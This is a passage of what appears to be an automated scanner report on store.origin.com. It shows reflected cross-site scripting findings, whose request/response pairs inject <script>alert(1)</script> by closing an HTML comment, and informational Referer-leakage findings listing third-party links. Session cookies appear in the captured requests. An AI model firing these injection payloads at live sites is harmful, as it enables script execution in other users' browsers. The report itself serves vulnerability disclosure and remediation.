Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800?be90c--><script>alert(1)</script>39260cc850a=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(1)%3C/script%3E84252b80866=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=129159595100,0)
Date: Fri, 24 Jun 2011 14:35:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 40083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926145188:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1476100&StyleVersion=12&ThemeID=718200&be90c--><script>alert(1)</script>39260cc850a=1&ceid=173716600&cename=TopHeader&id=ProductFinderPage&productID=226783800&script>
...[SNIP]...

1.11. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/en_US/pd/ThemeID.718200/productID.201797000

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cba28--><script>alert(1)</script>988e2a37d0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/en_US/pd/ThemeID.718200/productID.201797000?cba28--><script>alert(1)</script>988e2a37d0c=1 HTTP/1.1
Host: store.origin.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(0x062)%3C/script%3E84252b80866=1
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=688587274.260.0000; ORA_WX_SESSION=10.2.11.49:260-0#0; JSESSIONID=D16C78DD65928965E35E73DFD8E01BF0; VISITOR_ID=971D4E8DFAED43671E5F8C17C533E4FF95647E15D19DC326

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21784804153,0)
Date: Fri, 24 Jun 2011 14:25:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app41
Content-Length: 75613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308925551009:NODE=c2a4101:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=7130d483&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&cba28--><script>alert(1)</script>988e2a37d0c=1&ceid=173716600&cename=TopHeader&id=ProductDetailsPage&productID=201797000&script>
...[SNIP]...

1.12. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69277--><script>alert(1)</script>db7d3c456c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/home/?69277--><script>alert(1)</script>db7d3c456c5=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/home/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=215059140235,0)
Date: Fri, 24 Jun 2011 14:38:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926339848:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?69277--><script>alert(1)</script>db7d3c456c5=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...

2. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


2.1. http://store.origin.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /DRHM/store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/DRHM/store%25253FAction%25253DContinueShopping%252526SiteID%25253Dea%252526Locale%25253Den_US%252526ThemeID%25253D718200%252526Env%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=116274717585,0)
Date: Fri, 24 Jun 2011 14:36:09 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 64866


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926169147:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/esi?SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=meta.html"-->
<link type="text/css" rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/games/ea-com_all_v2-9.css" />
<!--[if IE 7]>
...[SNIP]...
<![endif]-->
<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<meta name="google-site-verification" content="CBfSIthiQRhv5lYo6sCn30bvIcodSEX0WTtWfW3jfZE" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePa
...[SNIP]...
<link href="http://store.origin.com" rel="canonical" />

<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<span><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/thumbnail/71081_97x57_1.jpg" /></span>
...[SNIP]...
<span><img src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/thumbnail/71072_97x57_e3.jpg" /></span>
...[SNIP]...
<span><img src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/thumbnail/71067_97x57_Play4Free.jpg" /></span>
...[SNIP]...
<a href="http://store.origin.com/store/ea/en_US/pd/productID.225126100?easid=Origin-AliceMadnessReturns_Web_Herobanner_PreOrder"><img class="dr_image" id="dr_targetImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/feature/70846_690x330_buynow.jpg" alt="Alice: Madness Returns(TM)" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="http://store.origin.com/store/ea/en_US/pd/productID.225126100?easid=Origin-AliceMadnessReturns_Web_Herobanner_PreOrder"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.225126100" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.225126100');return false;q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="http://store.origin.com/store/ea/html/pbPage.sims3-pets?easid=Origin-Sims3Pets_PreOrder_Web_Herobanner_PreOrder"><img class="dr_image" id="dr_targetImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/feature/71072_690x330_e3.jpg" alt="The Sims... 3 Pets Limited Edition" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="http://store.origin.com/store/ea/html/pbPage.sims3-pets?easid=Origin-Sims3Pets_PreOrder_Web_Herobanner_PreOrder"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.229351900" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.229351900');return false;q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/pre_order_en_US.gif" alt="Pre-order" /></a>
...[SNIP]...
<a href="http://store.origin.com/store/ea/html/pbPage.battlefield3_US_LE?easid=Origin-Battlefield3_Play4Free_Web_herobanner_Preorder"><img class="dr_image" id="dr_targetImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/home/feature/71067_690x330_LE_Play4Free_EN.jpg" alt="Battlefield 3... Limited Edition" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="http://store.origin.com/store/ea/html/pbPage.battlefield3_US_LE?easid=Origin-Battlefield3_Play4Free_Web_herobanner_Preorder"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.224766400" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.224766400');return false;q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/pre_order_en_US.gif" alt="Pre-order" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.208594200"><img border="0" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/09893_LB_135.jpg" alt="Shadows of the Damned..." /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.208594200" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
<a class="dr_buyNowButton" id="dr_addToCart" href="/store/ea/en_US/buy/ThemeID.718200/productID.208594200" onClick="q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.219720800"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/71017_LB_135.jpg" alt="The Sims... 3 Generations" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.219720800" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800');return false;q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.222885600"><img border="0" src="//drh2.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/71073_LB_135nr_e3.jpg" alt="Mass Effect 3" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.222885600" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.222885600" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.222885600');return false;q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/pre_order_en_US.gif" alt="Pre-order" /></a>
...[SNIP]...
<a href="/store/ea/en_US/pd/ThemeID.718200/productID.228918300"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/ea/images/product/large/71064_Special_LB_135.jpg" alt="The Sims Medieval(TM) Special Edition" /></a>
...[SNIP]...
<a class="dr_moreInfoButton" href="/store/ea/en_US/pd/ThemeID.718200/productID.228918300" onClick="q=false;"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/ea/eaSI/version/130/images/more_info_en_US.gif" alt="more info" /></a>
...[SNIP]...
store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.228918300" onclick="iFrameOverlay('/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.228918300');return false;q=false;"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/add_to_cart.gif" alt="add to cart" /></a>
...[SNIP]...
<a href="http://www.origin.com/about?easid=Origin-Origin_Web_HPRnav_Download"><img id="Origin" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/OriginApp_216x396.jpg" /></a>
...[SNIP]...
<a href="/store/ea/search/?keywords=amr&easid=Origin-AliceMadnessReturns_Web_Right_BuyNow
" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/71081_220x220.jpg" border="0" alt="Alice: Madness Returns(TM)" /></a>
...[SNIP]...
<a href="/store/ea/en_US/html/pbPage.reckoning_US?easid=Origin-AmalurReckoning_Web_Right_PreOrder" target="_blank">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/reckoning-220x220.jpg" border="0" alt="Kingdoms of Amalur: Reckoning..." /></a>
...[SNIP]...
<a href="/store/ea/html/pbPage.sims3-pets?easid=Origin-Sims3Pets_Web_Right_PreOrder" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/Sims3Pets_220x220.jpg" border="0" alt="The Sims... 3 Pets Limited Edition" /></a>
...[SNIP]...
<a href="http://www.origin.com/e3?easid=Origin-E3Trailers_Web_Right_LandingPage" target="_blank">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/exclusivetrailers_220x286.jpg" border="0" alt="Merchandising - DO NOT RETIRE" /></a>
...[SNIP]...
<a href="/store/ea/en_US/html/pbPage.me3_US?easid=Origin-MassEffect3_Web_Right_PreOrder" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/me3_220x220_1.jpg" border="0" alt="Mass Effect... 3 N7 Digital Deluxe Edition" /></a>
...[SNIP]...
<a href="/store/ea/html/pbPage.fs2011_01" target="_blank">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/ea/images/promo/FreeShipping_220x175_1.jpg" border="0" alt="MerchandisingProduct2" /></a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/racing-games">Racing</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/shooting-games">Shooting</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/puzzle-games">Puzzle</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/rpg-games">RPG</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/kids-games">Kids</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/strategy-games">Strategy</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/simulation-games">Simulation</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/sports-games">Sports</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/legalnotice.jsp">Legal Notices</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC/">Terms of Service</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<dd><a href="http://www.info.ea.com/">Corporate Info</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/termsofsale/US/enl/PC/">EA Terms of Sale</a>
...[SNIP]...
</script>


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/s_code_remote_v07.js"></script>
...[SNIP]...
<NOSCRIPT><IMG SRC="http://bp.specificclick.net?pixid=99017372" width=0 height=0 border=0></NOSCRIPT>
...[SNIP]...
<NOSCRIPT><IMG SRC="http://bp.specificclick.net?pixid=99028820" width=0 height=0 border=0></NOSCRIPT>
...[SNIP]...

2.2. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253APRODUCTFINDERPAGE%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/en_US/AddItemToRequisition/ThemeID.718200%252526productID%25253D226783800%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=120569681122,0)
Date: Fri, 24 Jun 2011 14:36:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 26163


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926165255:NODE=c2a5301:THREA
...[SNIP]...
<!--!esi:include src="/esi?SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=meta.html"-->
<link type="text/css" rel="stylesheet" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/games/ea-com_all_v2-9.css" />
<!--[if IE 7]>
...[SNIP]...
<![endif]-->
<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/ea/pb/images/Origin_favicon.ico" />
<meta name="google-site-verification" content="CBfSIthiQRhv5lYo6sCn30bvIcodSEX0WTtWfW3jfZE" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=ea&StyleID=1364100&StyleVersion=247&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/multimedia/js/ui.core-tabs-common-min.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
<a href="/DRHM/store?Action=ContinueShopping&SiteID=ea&Locale=en_US&ThemeID=718200&Env=BASE" onClick="q=false"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/ea/cm/buttons/continue_shoppingv7.png" /></a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/racing-games">Racing</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/shooting-games">Shooting</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/puzzle-games">Puzzle</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/rpg-games">RPG</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/kids-games">Kids</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/strategy-games">Strategy</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/simulation-games">Simulation</a>
...[SNIP]...
<dd><a href="http://www.ea.com/genre/sports-games">Sports</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/legalnotice.jsp">Legal Notices</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/WEBTERMS/US/en/PC/">Terms of Service</a>
...[SNIP]...
<dd><a href="http://www.ea.com/global/legal/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<dd><a href="http://www.info.ea.com/">Corporate Info</a>
...[SNIP]...
<dd><a href="http://tos.ea.com/legalapp/termsofsale/US/enl/PC/">EA Terms of Sale</a>
...[SNIP]...
<!--!/esi:include -->


<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/ebisuna/cm/multimedia/js/simpleSearchSuggest.js" type="text/javascript"></script>
...[SNIP]...
</script>

